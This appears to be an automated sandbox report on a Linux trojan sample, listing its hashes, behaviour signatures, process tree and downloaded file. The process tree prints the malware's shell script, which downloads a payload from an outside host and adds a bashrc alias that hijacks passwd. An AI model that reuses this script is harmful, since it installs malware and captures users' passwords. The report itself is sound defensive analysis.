Analysis

  • max time kernel
    1s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240226-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    08/04/2024, 14:31

General

  • Target

    SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf

  • Size

    912KB

  • MD5

    c4f9285f7b3396fedc9b544ad7ffd8b6

  • SHA1

    7d39a65e46e7c82f9544359410cc6a6d9c0de3a5

  • SHA256

    2acdc5c966113362906baebd720448324078c9855bc43ad8365c04b8e0064b36

  • SHA512

    47c1b2816df3d286430b713331e990efe19500a1c007c246908c42d4c63c0168f60c08dc47878b78f78887fa691140f288a0df681af3b3d07ab7ae46b7897a19

  • SSDEEP

    12288:IwspmaU6XxlWH4dxWk/sGjeQ60tzeBC9myy8bkklOSUZgw3:IwspdXxlWH4dsk/sGje10t6nkkDZgw

Score
6/10

Signatures

  • Creates/modifies environment variables (1 TTP, 1 IoC)
    Creating/modifying environment variables is a common persistence mechanism.
  • Modifies Bash startup script (1 TTP, 1 IoC)
  • Reads runtime system information (1 IoC)
    Reads data from /proc virtual filesystem.

Processes

  • /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
    /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
    PID: 1544
    • /bin/bash
      /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf -c "exec '/tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf' \"\$@\"" /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
      PID: 1544
      • /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
        /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
        PID: 1544
        • /bin/bash
          /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf -c " #!/bin/bash mkdir /var/tmp/.ssh cd /var/tmp/.ssh wget -q -P /var/tmp/.ssh vvnnmm.com/d/sshdr || curl -s -O vvnnmm.com/d/s > /var/tmp/.ssh/sshdr chmod +x /var/tmp/.ssh/sshdr x=\$(pwd) echo \"alias passwd='\$x/sshdr'\" >> ~/.bashrc source ~/.bashrc" /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
          Signatures: Creates/modifies environment variables; Modifies Bash startup script
          PID: 1544
          • /bin/mkdir
            mkdir /var/tmp/.ssh
            Signatures: Reads runtime system information
            PID: 1545
          • /usr/bin/wget
            wget -q -P /var/tmp/.ssh vvnnmm.com/d/sshdr
            PID: 1546
          • /bin/chmod
            chmod +x /var/tmp/.ssh/sshdr
            PID: 1550

Downloads

  • /var/tmp/.ssh/sshdr
    Filesize: 4.7MB
    MD5: e357e0385e8b38af9695ffcfc44e25e8
    SHA1: e32bbc56d5d2b94c2beccbc7ada0099e27c1d522
    SHA256: 32607f29b2e470a5b5f6c73a1f14eb874a140e61246e7b5b926bf10478b2a3f4
    SHA512: 2c279096a88e50641492bf5ab98c112b6f5615ac24010784b477d0133a0d4919e3d3528b22d3ef067745fa96834b5631d9a4513337cccc5653c28adcb018c55e